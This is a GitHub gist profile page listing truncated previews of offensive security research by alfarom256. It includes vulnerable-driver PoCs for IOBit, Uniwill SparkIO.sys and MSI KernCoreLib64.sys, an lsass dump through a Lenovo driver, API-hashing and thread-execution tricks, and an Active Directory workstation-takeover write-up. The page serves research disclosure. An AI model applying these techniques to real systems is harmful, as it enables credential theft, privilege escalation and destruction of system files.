Skip to content

Instantly share code, notes, and snippets.

View alfarom256's full-sized avatar
👽

alfarom256 alfarom256

👽
281 followers · 42 following
View GitHub Profile
@alfarom256
alfarom256 / IOBitStillSucks.cpp
Created January 6, 2025 22:54
Arbitrary File Delete in IOBit Malware Fighter "Pro"
#include <Windows.h>
#include <stdio.h>
const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)";
const char* strDeviceName = R"(\\.\IMFForceDelete123)";
int main() {
DWORD dwReturnVal = 0;
DWORD dwBytesReturned = 0;
BOOL bRes = FALSE;
@alfarom256
alfarom256 / Source.cpp
Last active September 28, 2024 04:01
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER
@alfarom256
alfarom256 / lel.cpp
Last active June 1, 2023 17:49
dump lsass but in a weird way you probably shouldn't do in prod with a vulnerable driver
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#include <DbgHelp.h>
#include "LenovoMemoryMgr.h"
#pragma comment(lib, "dbghelp")
typedef NTSTATUS(WINAPI* pNtQueryVirtualMemory)(HANDLE, PVOID, DWORD, PVOID, SIZE_T, PSIZE_T);
@alfarom256
alfarom256 / source.cpp
Last active October 15, 2024 08:22
Uniwill SparkIO.sys PoC
/*
IOCTL 0x40002004 : Arbitrary Physical Memory Read using MmMapIoSpace
IOCTL 0x40002008 : Close a handle of your choice! + Stack-based Buffer Overflow
IOCTL 0x40002000 : Arbitrary RW to IO ports
*/
#include <Windows.h>
#include <stdio.h>
#define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); }
#define IOCTL_TRIGGER_OVERFLOW 0x40002008
@alfarom256
alfarom256 / Source.cpp
Last active October 7, 2022 17:38
MSI KernCoreLib64.sys PoC
#include <Windows.h>
#include <stdio.h>
#define GLE( x ) { printf("%s failed with error: %d\n", x , GetLastError()); }
#define IOCTL_TRIGGER_OVERFLOW 0x80102040
DWORD64 genPattern(BYTE b) {
DWORD64 retVal = b;
retVal |= retVal << 8;
retVal |= retVal << 16;
@alfarom256
alfarom256 / proof.txt
Created May 23, 2022 20:55
fug xD
25AFF9D6516B1DFCFF60AE99DC7218203ECBA434FF74C310DFA00A123523621D
image.png
@alfarom256
alfarom256 / gist:0cb60906002704f37da92eb2be9936d8
Created December 8, 2021 01:13
proof2
a6ebf511dbc38b7c50f53e77d2965dfbc4aea9dcc09593df25ba8fc322075936
@alfarom256
alfarom256 / gist:e38ef9d6f8a3cef6250ea1714d101822
Created December 7, 2021 02:08
proof
2e95b64aee12f3e88f918564c76e526e47bb8b239683f9752914e71738e89e27
@alfarom256
alfarom256 / peb_ldr.h
Last active December 8, 2024 20:57
*Improved* header-only hash-based function resolution pt 3: LdrpHashTable
#pragma once
#include <Windows.h>
#include <winnt.h>
#include <winternl.h>
static BYTE prelude1[7]{
0x4D, 0x8d, 0x4b, 0xf0, // lea r9, [r11-10h]
0x45, 0x33, 0xc0 // xor r8d, r8d
};
@alfarom256
alfarom256 / Workstation-Takeover.md
Created July 25, 2021 20:04 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.